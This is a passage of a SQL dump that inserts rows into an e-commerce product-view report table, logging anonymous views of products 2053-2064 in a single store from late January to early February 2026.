(25193, NULL, NULL, 2063, 1, '2026-01-28 05:07:14'),
(25194, NULL, NULL, 2064, 1, '2026-01-28 05:18:43'),
(25195, NULL, NULL, 2064, 1, '2026-01-28 05:35:17'),
(25196, NULL, NULL, 2061, 1, '2026-01-28 05:36:59'),
(25197, NULL, NULL, 2064, 1, '2026-01-28 11:42:41'),
(25198, NULL, NULL, 2055, 1, '2026-01-28 12:02:57'),
(25199, NULL, NULL, 2060, 1, '2026-01-28 12:47:55'),
(25200, NULL, NULL, 2059, 1, '2026-01-28 13:01:28'),
(25201, NULL, NULL, 2054, 1, '2026-01-28 14:35:32'),
(25202, NULL, NULL, 2055, 1, '2026-01-28 15:02:27'),
(25203, NULL, NULL, 2054, 1, '2026-01-28 16:13:20'),
(25204, NULL, NULL, 2061, 1, '2026-01-28 16:38:31'),
(25205, NULL, NULL, 2062, 1, '2026-01-28 17:01:31'),
(25206, NULL, NULL, 2062, 1, '2026-01-28 17:01:56'),
(25207, NULL, NULL, 2060, 1, '2026-01-28 17:28:35'),
(25208, NULL, NULL, 2064, 1, '2026-01-28 17:30:48'),
(25209, NULL, NULL, 2064, 1, '2026-01-28 17:31:05'),
(25210, NULL, NULL, 2059, 1, '2026-01-28 17:56:11'),
(25211, NULL, NULL, 2059, 1, '2026-01-28 18:08:08'),
(25212, NULL, NULL, 2054, 1, '2026-01-28 19:20:30'),
(25213, NULL, NULL, 2053, 1, '2026-01-28 20:47:17'),
(25214, NULL, NULL, 2061, 1, '2026-01-28 21:09:52'),
(25215, NULL, NULL, 2059, 1, '2026-01-28 22:01:13'),
(25216, NULL, NULL, 2061, 1, '2026-01-28 23:13:53'),
(25217, NULL, NULL, 2064, 1, '2026-01-28 23:17:36'),
(25218, NULL, NULL, 2064, 1, '2026-01-29 02:16:29'),
(25219, NULL, NULL, 2063, 1, '2026-01-29 03:08:20'),
(25220, NULL, NULL, 2064, 1, '2026-01-29 03:12:00'),
(25221, NULL, NULL, 2062, 1, '2026-01-29 03:12:15'),
(25222, NULL, NULL, 2055, 1, '2026-01-29 03:12:28'),
(25223, NULL, NULL, 2064, 1, '2026-01-29 04:21:14'),
(25224, NULL, NULL, 2064, 1, '2026-01-29 05:50:14'),
(25225, NULL, NULL, 2059, 1, '2026-01-29 09:51:55'),
(25226, NULL, NULL, 2064, 1, '2026-01-29 10:06:59'),
(25227, NULL, NULL, 2062, 1, '2026-01-29 10:45:07'),
(25228, NULL, NULL, 2063, 1, '2026-01-29 10:45:13'),
(25229, NULL, NULL, 2062, 1, '2026-01-29 10:45:18'),
(25230, NULL, NULL, 2061, 1, '2026-01-29 10:58:55'),
(25231, NULL, NULL, 2054, 1, '2026-01-29 12:19:55'),
(25232, NULL, NULL, 2055, 1, '2026-01-29 12:37:59'),
(25233, NULL, NULL, 2064, 1, '2026-01-29 12:40:39'),
(25234, NULL, NULL, 2060, 1, '2026-01-29 12:50:22'),
(25235, NULL, NULL, 2060, 1, '2026-01-29 12:50:25'),
(25236, NULL, NULL, 2061, 1, '2026-01-29 13:00:31'),
(25237, NULL, NULL, 2062, 1, '2026-01-29 13:01:25'),
(25238, NULL, NULL, 2061, 1, '2026-01-29 13:01:31'),
(25239, NULL, NULL, 2058, 1, '2026-01-29 13:01:59'),
(25240, NULL, NULL, 2063, 1, '2026-01-29 13:02:01'),
(25241, NULL, NULL, 2053, 1, '2026-01-29 13:19:49'),
(25242, NULL, NULL, 2064, 1, '2026-01-29 13:34:45'),
(25243, NULL, NULL, 2064, 1, '2026-01-29 13:34:55'),
(25244, NULL, NULL, 2059, 1, '2026-01-29 13:36:55'),
(25245, NULL, NULL, 2060, 1, '2026-01-29 13:51:02'),
(25246, NULL, NULL, 2060, 1, '2026-01-29 13:51:05'),
(25247, NULL, NULL, 2055, 1, '2026-01-29 14:48:19'),
(25248, NULL, NULL, 2064, 1, '2026-01-29 14:48:21'),
(25249, NULL, NULL, 2061, 1, '2026-01-29 14:48:24'),
(25250, NULL, NULL, 2058, 1, '2026-01-29 14:48:27'),
(25251, NULL, NULL, 2064, 1, '2026-01-29 15:07:03'),
(25252, NULL, NULL, 2053, 1, '2026-01-29 15:35:16'),
(25253, NULL, NULL, 2061, 1, '2026-01-29 15:38:59'),
(25254, NULL, NULL, 2061, 1, '2026-01-29 16:29:23'),
(25255, NULL, NULL, 2062, 1, '2026-01-29 17:10:26'),
(25256, NULL, NULL, 2062, 1, '2026-01-29 17:10:48'),
(25257, NULL, NULL, 2063, 1, '2026-01-29 20:22:17'),
(25258, NULL, NULL, 2064, 1, '2026-01-29 21:22:44'),
(25259, NULL, NULL, 2054, 1, '2026-01-29 21:30:30'),
(25260, NULL, NULL, 2061, 1, '2026-01-29 22:11:13'),
(25261, NULL, NULL, 2061, 1, '2026-01-29 23:25:08'),
(25262, NULL, NULL, 2063, 1, '2026-01-29 23:41:49'),
(25263, NULL, NULL, 2062, 1, '2026-01-29 23:41:52'),
(25264, NULL, NULL, 2061, 1, '2026-01-29 23:41:59'),
(25265, NULL, NULL, 2064, 1, '2026-01-30 00:00:23'),
(25266, NULL, NULL, 2061, 1, '2026-01-30 01:54:22'),
(25267, NULL, NULL, 2054, 1, '2026-01-30 01:54:59'),
(25268, NULL, NULL, 2054, 1, '2026-01-30 02:04:57'),
(25269, NULL, NULL, 2062, 1, '2026-01-30 02:12:58'),
(25270, NULL, NULL, 2063, 1, '2026-01-30 02:25:05'),
(25271, NULL, NULL, 2058, 1, '2026-01-30 04:01:35'),
(25272, NULL, NULL, 2063, 1, '2026-01-30 04:54:44'),
(25273, NULL, NULL, 2063, 1, '2026-01-30 04:54:49'),
(25274, NULL, NULL, 2064, 1, '2026-01-30 04:55:55'),
(25275, NULL, NULL, 2064, 1, '2026-01-30 05:06:10'),
(25276, NULL, NULL, 2064, 1, '2026-01-30 05:06:11'),
(25277, NULL, NULL, 2063, 1, '2026-01-30 05:06:11'),
(25278, NULL, NULL, 2064, 1, '2026-01-30 05:06:11'),
(25279, NULL, NULL, 2062, 1, '2026-01-30 05:06:11'),
(25280, NULL, NULL, 2061, 1, '2026-01-30 05:06:12'),
(25281, NULL, NULL, 2060, 1, '2026-01-30 05:06:13'),
(25282, NULL, NULL, 2058, 1, '2026-01-30 05:06:14'),
(25283, NULL, NULL, 2059, 1, '2026-01-30 05:06:14'),
(25284, NULL, NULL, 2064, 1, '2026-01-30 05:06:14'),
(25285, NULL, NULL, 2055, 1, '2026-01-30 05:06:14'),
(25286, NULL, NULL, 2062, 1, '2026-01-30 05:06:14'),
(25287, NULL, NULL, 2061, 1, '2026-01-30 05:06:14'),
(25288, NULL, NULL, 2064, 1, '2026-01-30 05:06:15'),
(25289, NULL, NULL, 2060, 1, '2026-01-30 05:06:15'),
(25290, NULL, NULL, 2064, 1, '2026-01-30 05:06:16'),
(25291, NULL, NULL, 2058, 1, '2026-01-30 05:06:16'),
(25292, NULL, NULL, 2059, 1, '2026-01-30 05:06:16'),
(25293, NULL, NULL, 2064, 1, '2026-01-30 05:06:16'),
(25294, NULL, NULL, 2062, 1, '2026-01-30 05:06:16'),
(25295, NULL, NULL, 2060, 1, '2026-01-30 05:06:16'),
(25296, NULL, NULL, 2061, 1, '2026-01-30 05:06:16'),
(25297, NULL, NULL, 2055, 1, '2026-01-30 05:06:17');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(25298, NULL, NULL, 2058, 1, '2026-01-30 05:06:18'),
(25299, NULL, NULL, 2054, 1, '2026-01-30 05:06:18'),
(25300, NULL, NULL, 2059, 1, '2026-01-30 05:06:18'),
(25301, NULL, NULL, 2064, 1, '2026-01-30 05:06:19'),
(25302, NULL, NULL, 2064, 1, '2026-01-30 05:06:19'),
(25303, NULL, NULL, 2055, 1, '2026-01-30 05:06:19'),
(25304, NULL, NULL, 2064, 1, '2026-01-30 05:06:20'),
(25305, NULL, NULL, 2064, 1, '2026-01-30 05:06:20'),
(25306, NULL, NULL, 2064, 1, '2026-01-30 05:08:20'),
(25307, NULL, NULL, 2061, 1, '2026-01-30 05:08:20'),
(25308, NULL, NULL, 2064, 1, '2026-01-30 05:08:20'),
(25309, NULL, NULL, 2062, 1, '2026-01-30 05:08:20'),
(25310, NULL, NULL, 2064, 1, '2026-01-30 05:08:20'),
(25311, NULL, NULL, 2063, 1, '2026-01-30 05:08:20'),
(25312, NULL, NULL, 2059, 1, '2026-01-30 05:08:21'),
(25313, NULL, NULL, 2058, 1, '2026-01-30 05:08:21'),
(25314, NULL, NULL, 2060, 1, '2026-01-30 05:08:21'),
(25315, NULL, NULL, 2055, 1, '2026-01-30 05:08:22'),
(25316, NULL, NULL, 2054, 1, '2026-01-30 05:08:22'),
(25317, NULL, NULL, 2060, 1, '2026-01-30 06:21:30'),
(25318, NULL, NULL, 2054, 1, '2026-01-30 06:21:47'),
(25319, NULL, NULL, 2058, 1, '2026-01-30 06:22:40'),
(25320, NULL, NULL, 2063, 1, '2026-01-30 06:22:50'),
(25321, NULL, NULL, 2062, 1, '2026-01-30 08:55:47'),
(25322, NULL, NULL, 2059, 1, '2026-01-30 09:50:49'),
(25323, NULL, NULL, 2053, 1, '2026-01-30 10:09:07'),
(25324, NULL, NULL, 2058, 1, '2026-01-30 10:11:11'),
(25325, NULL, NULL, 2054, 1, '2026-01-30 11:25:41'),
(25326, NULL, NULL, 2064, 1, '2026-01-30 12:04:33'),
(25327, NULL, NULL, 2061, 1, '2026-01-30 12:13:01'),
(25328, NULL, NULL, 2055, 1, '2026-01-30 12:22:43'),
(25329, NULL, NULL, 2060, 1, '2026-01-30 14:01:47'),
(25330, NULL, NULL, 2060, 1, '2026-01-30 14:01:50'),
(25331, NULL, NULL, 2061, 1, '2026-01-30 15:27:52'),
(25332, NULL, NULL, 2062, 1, '2026-01-30 17:31:28'),
(25333, NULL, NULL, 2062, 1, '2026-01-30 17:31:59'),
(25334, NULL, NULL, 2064, 1, '2026-01-30 18:04:47'),
(25335, NULL, NULL, 2064, 1, '2026-01-30 18:04:53'),
(25336, NULL, NULL, 2054, 1, '2026-01-30 18:10:37'),
(25337, NULL, NULL, 2064, 1, '2026-01-30 20:01:54'),
(25338, NULL, NULL, 2064, 1, '2026-01-30 20:29:05'),
(25339, NULL, NULL, 2064, 1, '2026-01-30 20:29:16'),
(25340, NULL, NULL, 2064, 1, '2026-01-30 20:29:22'),
(25341, NULL, NULL, 2059, 1, '2026-01-30 20:29:23'),
(25342, NULL, NULL, 2061, 1, '2026-01-30 20:29:23'),
(25343, NULL, NULL, 2058, 1, '2026-01-30 20:29:23'),
(25344, NULL, NULL, 2063, 1, '2026-01-30 20:29:23'),
(25345, NULL, NULL, 2064, 1, '2026-01-30 20:29:23'),
(25346, NULL, NULL, 2062, 1, '2026-01-30 20:29:23'),
(25347, NULL, NULL, 2060, 1, '2026-01-30 20:29:55'),
(25348, NULL, NULL, 2064, 1, '2026-01-30 20:30:05'),
(25349, NULL, NULL, 2060, 1, '2026-01-30 20:30:06'),
(25350, NULL, NULL, 2053, 1, '2026-01-30 20:30:07'),
(25351, NULL, NULL, 2054, 1, '2026-01-30 20:30:08'),
(25352, NULL, NULL, 2055, 1, '2026-01-30 20:30:09'),
(25353, NULL, NULL, 2054, 1, '2026-01-30 20:30:14'),
(25354, NULL, NULL, 2053, 1, '2026-01-30 20:30:16'),
(25355, NULL, NULL, 2053, 1, '2026-01-30 20:30:17'),
(25356, NULL, NULL, 2055, 1, '2026-01-30 20:30:17'),
(25357, NULL, NULL, 2064, 1, '2026-01-30 21:46:04'),
(25358, NULL, NULL, 2054, 1, '2026-01-30 21:47:12'),
(25359, NULL, NULL, 2063, 1, '2026-01-30 21:56:16'),
(25360, NULL, NULL, 2061, 1, '2026-01-30 23:35:25'),
(25361, NULL, NULL, 2054, 1, '2026-01-31 00:08:07'),
(25362, NULL, NULL, 2064, 1, '2026-01-31 00:08:11'),
(25363, NULL, NULL, 2064, 1, '2026-01-31 01:16:05'),
(25364, NULL, NULL, 2062, 1, '2026-01-31 01:16:09'),
(25365, NULL, NULL, 2064, 1, '2026-01-31 01:16:10'),
(25366, NULL, NULL, 2061, 1, '2026-01-31 01:16:11'),
(25367, NULL, NULL, 2059, 1, '2026-01-31 01:16:12'),
(25368, NULL, NULL, 2058, 1, '2026-01-31 01:16:13'),
(25369, NULL, NULL, 2064, 1, '2026-01-31 01:16:14'),
(25370, NULL, NULL, 2063, 1, '2026-01-31 01:16:15'),
(25371, NULL, NULL, 2060, 1, '2026-01-31 01:16:40'),
(25372, NULL, NULL, 2053, 1, '2026-01-31 01:16:49'),
(25373, NULL, NULL, 2055, 1, '2026-01-31 01:16:51'),
(25374, NULL, NULL, 2060, 1, '2026-01-31 01:16:52'),
(25375, NULL, NULL, 2064, 1, '2026-01-31 01:16:53'),
(25376, NULL, NULL, 2054, 1, '2026-01-31 01:16:54'),
(25377, NULL, NULL, 2054, 1, '2026-01-31 01:16:59'),
(25378, NULL, NULL, 2055, 1, '2026-01-31 01:17:01'),
(25379, NULL, NULL, 2063, 1, '2026-01-31 01:23:07'),
(25380, NULL, NULL, 2064, 1, '2026-01-31 03:20:06'),
(25381, NULL, NULL, 2053, 1, '2026-01-31 04:41:13'),
(25382, NULL, NULL, 2054, 1, '2026-01-31 05:11:05'),
(25383, NULL, NULL, 2064, 1, '2026-01-31 05:45:24'),
(25384, NULL, NULL, 2059, 1, '2026-01-31 07:08:47'),
(25385, NULL, NULL, 2060, 1, '2026-01-31 07:09:02'),
(25386, NULL, NULL, 2061, 1, '2026-01-31 08:30:29'),
(25387, NULL, NULL, 2061, 1, '2026-01-31 08:56:35'),
(25388, NULL, NULL, 2061, 1, '2026-01-31 09:14:42'),
(25389, NULL, NULL, 2061, 1, '2026-01-31 09:14:43'),
(25390, NULL, NULL, 2064, 1, '2026-01-31 09:19:24'),
(25391, NULL, NULL, 2061, 1, '2026-01-31 09:22:08'),
(25392, NULL, NULL, 2061, 1, '2026-01-31 09:23:00'),
(25393, NULL, NULL, 2061, 1, '2026-01-31 09:33:14'),
(25394, NULL, NULL, 2063, 1, '2026-01-31 11:05:02'),
(25395, NULL, NULL, 2064, 1, '2026-01-31 11:05:13'),
(25396, NULL, NULL, 2062, 1, '2026-01-31 11:05:16'),
(25397, NULL, NULL, 2055, 1, '2026-01-31 11:05:19'),
(25398, NULL, NULL, 2054, 1, '2026-01-31 11:28:03'),
(25399, NULL, NULL, 2059, 1, '2026-01-31 11:46:26'),
(25400, NULL, NULL, 2061, 1, '2026-01-31 12:03:17'),
(25401, NULL, NULL, 2061, 1, '2026-01-31 14:38:51'),
(25402, NULL, NULL, 2053, 1, '2026-01-31 15:35:14'),
(25403, NULL, NULL, 2064, 1, '2026-01-31 15:37:15'),
(25404, NULL, NULL, 2064, 1, '2026-01-31 16:40:34'),
(25405, NULL, NULL, 2062, 1, '2026-01-31 16:47:24'),
(25406, NULL, NULL, 2061, 1, '2026-01-31 16:48:02'),
(25407, NULL, NULL, 2058, 1, '2026-01-31 16:48:33'),
(25408, NULL, NULL, 2063, 1, '2026-01-31 16:50:13'),
(25409, NULL, NULL, 2062, 1, '2026-01-31 17:27:35'),
(25410, NULL, NULL, 2062, 1, '2026-01-31 18:01:26'),
(25411, NULL, NULL, 2062, 1, '2026-01-31 18:01:49'),
(25412, NULL, NULL, 2061, 1, '2026-01-31 18:11:40'),
(25413, NULL, NULL, 2064, 1, '2026-01-31 18:27:58'),
(25414, NULL, NULL, 2054, 1, '2026-01-31 18:31:30'),
(25415, NULL, NULL, 2064, 1, '2026-01-31 18:48:09'),
(25416, NULL, NULL, 2059, 1, '2026-01-31 19:17:18'),
(25417, NULL, NULL, 2062, 1, '2026-01-31 19:50:12'),
(25418, NULL, NULL, 2062, 1, '2026-01-31 20:36:20'),
(25419, NULL, NULL, 2060, 1, '2026-01-31 21:46:50'),
(25420, NULL, NULL, 2060, 1, '2026-01-31 21:46:54'),
(25421, NULL, NULL, 2061, 1, '2026-01-31 22:06:10'),
(25422, NULL, NULL, 2054, 1, '2026-01-31 22:48:18'),
(25423, NULL, NULL, 2062, 1, '2026-01-31 23:25:11'),
(25424, NULL, NULL, 2064, 1, '2026-02-01 00:08:18'),
(25425, NULL, NULL, 2064, 1, '2026-02-01 00:08:18'),
(25426, NULL, NULL, 2064, 1, '2026-02-01 00:08:19'),
(25427, NULL, NULL, 2062, 1, '2026-02-01 00:08:19'),
(25428, NULL, NULL, 2063, 1, '2026-02-01 00:08:19'),
(25429, NULL, NULL, 2061, 1, '2026-02-01 00:08:21'),
(25430, NULL, NULL, 2060, 1, '2026-02-01 00:08:21'),
(25431, NULL, NULL, 2059, 1, '2026-02-01 00:08:21'),
(25432, NULL, NULL, 2064, 1, '2026-02-01 00:08:21'),
(25433, NULL, NULL, 2058, 1, '2026-02-01 00:08:21'),
(25434, NULL, NULL, 2064, 1, '2026-02-01 00:08:21'),
(25435, NULL, NULL, 2064, 1, '2026-02-01 00:08:22'),
(25436, NULL, NULL, 2063, 1, '2026-02-01 00:08:22'),
(25437, NULL, NULL, 2061, 1, '2026-02-01 00:08:23'),
(25438, NULL, NULL, 2060, 1, '2026-02-01 00:08:24'),
(25439, NULL, NULL, 2064, 1, '2026-02-01 00:08:24'),
(25440, NULL, NULL, 2059, 1, '2026-02-01 00:08:24'),
(25441, NULL, NULL, 2064, 1, '2026-02-01 00:08:25'),
(25442, NULL, NULL, 2064, 1, '2026-02-01 00:08:25'),
(25443, NULL, NULL, 2063, 1, '2026-02-01 00:08:25'),
(25444, NULL, NULL, 2060, 1, '2026-02-01 00:08:26'),
(25445, NULL, NULL, 2058, 1, '2026-02-01 00:08:26'),
(25446, NULL, NULL, 2061, 1, '2026-02-01 00:08:26'),
(25447, NULL, NULL, 2059, 1, '2026-02-01 00:08:27'),
(25448, NULL, NULL, 2058, 1, '2026-02-01 00:08:28'),
(25449, NULL, NULL, 2064, 1, '2026-02-01 00:08:28'),
(25450, NULL, NULL, 2064, 1, '2026-02-01 00:08:28'),
(25451, NULL, NULL, 2055, 1, '2026-02-01 00:08:28'),
(25452, NULL, NULL, 2061, 1, '2026-02-01 00:08:28'),
(25453, NULL, NULL, 2064, 1, '2026-02-01 00:08:28'),
(25454, NULL, NULL, 2063, 1, '2026-02-01 00:08:28'),
(25455, NULL, NULL, 2060, 1, '2026-02-01 00:08:29'),
(25456, NULL, NULL, 2064, 1, '2026-02-01 00:08:29'),
(25457, NULL, NULL, 2059, 1, '2026-02-01 00:08:30'),
(25458, NULL, NULL, 2064, 1, '2026-02-01 00:08:30'),
(25459, NULL, NULL, 2064, 1, '2026-02-01 00:08:30'),
(25460, NULL, NULL, 2063, 1, '2026-02-01 00:08:30'),
(25461, NULL, NULL, 2061, 1, '2026-02-01 00:08:30'),
(25462, NULL, NULL, 2060, 1, '2026-02-01 00:08:30'),
(25463, NULL, NULL, 2058, 1, '2026-02-01 00:08:31'),
(25464, NULL, NULL, 2055, 1, '2026-02-01 00:08:31'),
(25465, NULL, NULL, 2059, 1, '2026-02-01 00:08:31'),
(25466, NULL, NULL, 2064, 1, '2026-02-01 00:08:32'),
(25467, NULL, NULL, 2064, 1, '2026-02-01 00:08:32'),
(25468, NULL, NULL, 2064, 1, '2026-02-01 00:08:32'),
(25469, NULL, NULL, 2055, 1, '2026-02-01 00:08:32'),
(25470, NULL, NULL, 2058, 1, '2026-02-01 00:08:32'),
(25471, NULL, NULL, 2061, 1, '2026-02-01 00:08:32'),
(25472, NULL, NULL, 2063, 1, '2026-02-01 00:08:32'),
(25473, NULL, NULL, 2060, 1, '2026-02-01 00:08:33'),
(25474, NULL, NULL, 2059, 1, '2026-02-01 00:08:34'),
(25475, NULL, NULL, 2054, 1, '2026-02-01 00:08:34'),
(25476, NULL, NULL, 2058, 1, '2026-02-01 00:08:34'),
(25477, NULL, NULL, 2054, 1, '2026-02-01 00:08:36'),
(25478, NULL, NULL, 2054, 1, '2026-02-01 00:08:38'),
(25479, NULL, NULL, 2061, 1, '2026-02-01 00:13:09'),
(25480, NULL, NULL, 2053, 1, '2026-02-01 02:13:11'),
(25481, NULL, NULL, 2061, 1, '2026-02-01 03:06:16'),
(25482, NULL, NULL, 2058, 1, '2026-02-01 03:15:46'),
(25483, NULL, NULL, 2055, 1, '2026-02-01 03:27:22'),
(25484, NULL, NULL, 2054, 1, '2026-02-01 03:34:30'),
(25485, NULL, NULL, 2061, 1, '2026-02-01 04:04:29'),
(25486, NULL, NULL, 2064, 1, '2026-02-01 05:42:52'),
(25487, NULL, NULL, 2058, 1, '2026-02-01 06:00:55'),
(25488, NULL, NULL, 2054, 1, '2026-02-01 06:57:44'),
(25489, NULL, NULL, 2061, 1, '2026-02-01 07:38:36'),
(25490, NULL, NULL, 2061, 1, '2026-02-01 08:07:51'),
(25491, NULL, NULL, 2061, 1, '2026-02-01 10:05:43'),
(25492, NULL, NULL, 2054, 1, '2026-02-01 11:31:14'),
(25493, NULL, NULL, 2064, 1, '2026-02-01 12:05:59'),
(25494, NULL, NULL, 2064, 1, '2026-02-01 12:32:11'),
(25495, NULL, NULL, 2055, 1, '2026-02-01 13:23:18'),
(25496, NULL, NULL, 2054, 1, '2026-02-01 14:55:35'),
(25497, NULL, NULL, 2064, 1, '2026-02-01 15:45:16'),
(25498, NULL, NULL, 2062, 1, '2026-02-01 16:45:21'),
(25499, NULL, NULL, 2062, 1, '2026-02-01 16:45:37'),
(25500, NULL, NULL, 2054, 1, '2026-02-01 17:18:15'),
(25501, NULL, NULL, 2063, 1, '2026-02-01 17:23:18'),
(25502, NULL, NULL, 2061, 1, '2026-02-01 17:31:22'),
(25503, NULL, NULL, 2054, 1, '2026-02-01 19:04:31'),
(25504, NULL, NULL, 2058, 1, '2026-02-01 19:09:20'),
(25505, NULL, NULL, 2060, 1, '2026-02-01 19:15:16'),
(25506, NULL, NULL, 2063, 1, '2026-02-01 19:18:07'),
(25507, NULL, NULL, 2058, 1, '2026-02-01 21:34:45'),
(25508, NULL, NULL, 2061, 1, '2026-02-02 01:20:33'),
(25509, NULL, NULL, 2064, 1, '2026-02-02 03:40:26'),
(25510, NULL, NULL, 2059, 1, '2026-02-02 04:07:39'),
(25511, NULL, NULL, 2058, 1, '2026-02-02 04:16:34'),
(25512, NULL, NULL, 2061, 1, '2026-02-02 05:08:21'),
(25513, NULL, NULL, 2054, 1, '2026-02-02 05:13:26'),
(25514, NULL, NULL, 2064, 1, '2026-02-02 05:20:31'),
(25515, NULL, NULL, 2054, 1, '2026-02-02 05:24:56'),
(25516, NULL, NULL, 2054, 1, '2026-02-02 08:44:23'),
(25517, NULL, NULL, 2059, 1, '2026-02-02 08:57:27'),
(25518, NULL, NULL, 2064, 1, '2026-02-02 11:21:53'),
(25519, NULL, NULL, 2064, 1, '2026-02-02 15:46:40'),
(25520, NULL, NULL, 2062, 1, '2026-02-02 16:32:15'),
(25521, NULL, NULL, 2062, 1, '2026-02-02 16:32:45'),
(25522, NULL, NULL, 2064, 1, '2026-02-02 16:40:53'),
(25523, NULL, NULL, 2061, 1, '2026-02-02 17:15:22'),
(25524, NULL, NULL, 2060, 1, '2026-02-02 17:37:18'),
(25525, NULL, NULL, 2064, 1, '2026-02-02 18:07:23'),
(25526, NULL, NULL, 2054, 1, '2026-02-02 18:08:09'),
(25527, NULL, NULL, 2055, 1, '2026-02-02 18:10:17'),
(25528, NULL, NULL, 2058, 1, '2026-02-02 18:10:36'),
(25529, NULL, NULL, 2059, 1, '2026-02-02 18:10:39'),
(25530, NULL, NULL, 2060, 1, '2026-02-02 18:13:21'),
(25531, NULL, NULL, 2054, 1, '2026-02-02 18:53:33'),
(25532, NULL, NULL, 2058, 1, '2026-02-02 18:54:35'),
(25533, NULL, NULL, 2054, 1, '2026-02-02 19:58:59'),
(25534, NULL, NULL, 2058, 1, '2026-02-02 19:59:06'),
(25535, NULL, NULL, 2064, 1, '2026-02-02 20:13:37'),
(25536, NULL, NULL, 2063, 1, '2026-02-02 21:53:21'),
(25537, NULL, NULL, 2061, 1, '2026-02-02 23:30:29'),
(25538, NULL, NULL, 2060, 1, '2026-02-03 00:03:17'),
(25539, NULL, NULL, 2054, 1, '2026-02-03 00:18:30'),
(25540, NULL, NULL, 2054, 1, '2026-02-03 02:44:12'),
(25541, NULL, NULL, 2054, 1, '2026-02-03 03:27:44'),
(25542, NULL, NULL, 2060, 1, '2026-02-03 04:13:59'),
(25543, NULL, NULL, 2060, 1, '2026-02-03 04:14:01'),
(25544, NULL, NULL, 2061, 1, '2026-02-03 04:38:45'),
(25545, NULL, NULL, 2060, 1, '2026-02-03 04:53:34'),
(25546, NULL, NULL, 2060, 1, '2026-02-03 04:53:36'),
(25547, NULL, NULL, 2064, 1, '2026-02-03 05:06:52'),
(25548, NULL, NULL, 2062, 1, '2026-02-03 05:19:14'),
(25549, NULL, NULL, 2064, 1, '2026-02-03 05:20:38'),
(25550, NULL, NULL, 2061, 1, '2026-02-03 05:33:02'),
(25551, NULL, NULL, 2062, 1, '2026-02-03 05:34:01'),
(25552, NULL, NULL, 2064, 1, '2026-02-03 05:36:04'),
(25553, NULL, NULL, 2055, 1, '2026-02-03 05:36:22'),
(25554, NULL, NULL, 2058, 1, '2026-02-03 05:38:24'),
(25555, NULL, NULL, 2060, 1, '2026-02-03 05:39:04'),
(25556, NULL, NULL, 2063, 1, '2026-02-03 05:40:50'),
(25557, NULL, NULL, 2053, 1, '2026-02-03 05:47:35'),
(25558, NULL, NULL, 2059, 1, '2026-02-03 05:55:01'),
(25559, NULL, NULL, 2064, 1, '2026-02-03 05:58:01'),
(25560, NULL, NULL, 2064, 1, '2026-02-03 05:58:46'),
(25561, NULL, NULL, 2054, 1, '2026-02-03 05:59:44'),
(25562, NULL, NULL, 2061, 1, '2026-02-03 06:40:54'),
(25563, NULL, NULL, 2054, 1, '2026-02-03 07:07:53'),
(25564, NULL, NULL, 2064, 1, '2026-02-03 09:28:19'),
(25565, NULL, NULL, 2060, 1, '2026-02-03 14:03:57'),
(25566, NULL, NULL, 2055, 1, '2026-02-03 14:11:25'),
(25567, NULL, NULL, 2054, 1, '2026-02-03 14:11:53'),
(25568, NULL, NULL, 2054, 1, '2026-02-03 14:12:11'),
(25569, NULL, NULL, 2055, 1, '2026-02-03 14:14:11'),
(25570, NULL, NULL, 2064, 1, '2026-02-03 15:51:46'),
(25571, NULL, NULL, 2064, 1, '2026-02-03 16:01:36'),
(25572, NULL, NULL, 2064, 1, '2026-02-03 16:01:36'),
(25573, NULL, NULL, 2064, 1, '2026-02-03 16:01:36'),
(25574, NULL, NULL, 2064, 1, '2026-02-03 16:01:37'),
(25575, NULL, NULL, 2064, 1, '2026-02-03 16:01:39'),
(25576, NULL, NULL, 2064, 1, '2026-02-03 16:01:42'),
(25577, NULL, NULL, 2064, 1, '2026-02-03 16:01:43'),
(25578, NULL, NULL, 2064, 1, '2026-02-03 16:01:45'),
(25579, NULL, NULL, 2064, 1, '2026-02-03 16:01:45'),
(25580, NULL, NULL, 2062, 1, '2026-02-03 16:01:45'),
(25581, NULL, NULL, 2063, 1, '2026-02-03 16:01:45'),
(25582, NULL, NULL, 2061, 1, '2026-02-03 16:01:45'),
(25583, NULL, NULL, 2060, 1, '2026-02-03 16:01:45'),
(25584, NULL, NULL, 2064, 1, '2026-02-03 16:01:46'),
(25585, NULL, NULL, 2064, 1, '2026-02-03 16:01:47'),
(25586, NULL, NULL, 2059, 1, '2026-02-03 16:01:47'),
(25587, NULL, NULL, 2058, 1, '2026-02-03 16:01:47'),
(25588, NULL, NULL, 2062, 1, '2026-02-03 16:01:48'),
(25589, NULL, NULL, 2061, 1, '2026-02-03 16:01:48'),
(25590, NULL, NULL, 2064, 1, '2026-02-03 16:01:48'),
(25591, NULL, NULL, 2060, 1, '2026-02-03 16:01:48'),
(25592, NULL, NULL, 2063, 1, '2026-02-03 16:01:48'),
(25593, NULL, NULL, 2055, 1, '2026-02-03 16:01:48'),
(25594, NULL, NULL, 2064, 1, '2026-02-03 16:01:49'),
(25595, NULL, NULL, 2063, 1, '2026-02-03 16:01:50'),
(25596, NULL, NULL, 2064, 1, '2026-02-03 16:01:50'),
(25597, NULL, NULL, 2061, 1, '2026-02-03 16:01:50'),
(25598, NULL, NULL, 2062, 1, '2026-02-03 16:01:50'),
(25599, NULL, NULL, 2060, 1, '2026-02-03 16:01:50'),
(25600, NULL, NULL, 2064, 1, '2026-02-03 16:01:50'),
(25601, NULL, NULL, 2058, 1, '2026-02-03 16:01:51'),
(25602, NULL, NULL, 2059, 1, '2026-02-03 16:01:52'),
(25603, NULL, NULL, 2055, 1, '2026-02-03 16:01:52'),
(25604, NULL, NULL, 2058, 1, '2026-02-03 16:01:53'),
(25605, NULL, NULL, 2062, 1, '2026-02-03 16:01:53'),
(25606, NULL, NULL, 2059, 1, '2026-02-03 16:01:53'),
(25607, NULL, NULL, 2063, 1, '2026-02-03 16:01:53'),
(25608, NULL, NULL, 2061, 1, '2026-02-03 16:01:53'),
(25609, NULL, NULL, 2064, 1, '2026-02-03 16:01:53'),
(25610, NULL, NULL, 2060, 1, '2026-02-03 16:01:53'),
(25611, NULL, NULL, 2055, 1, '2026-02-03 16:01:53'),
(25612, NULL, NULL, 2064, 1, '2026-02-03 16:01:54'),
(25613, NULL, NULL, 2062, 1, '2026-02-03 16:01:54'),
(25614, NULL, NULL, 2059, 1, '2026-02-03 16:01:55'),
(25615, NULL, NULL, 2063, 1, '2026-02-03 16:01:55'),
(25616, NULL, NULL, 2060, 1, '2026-02-03 16:01:55'),
(25617, NULL, NULL, 2061, 1, '2026-02-03 16:01:55'),
(25618, NULL, NULL, 2058, 1, '2026-02-03 16:01:55'),
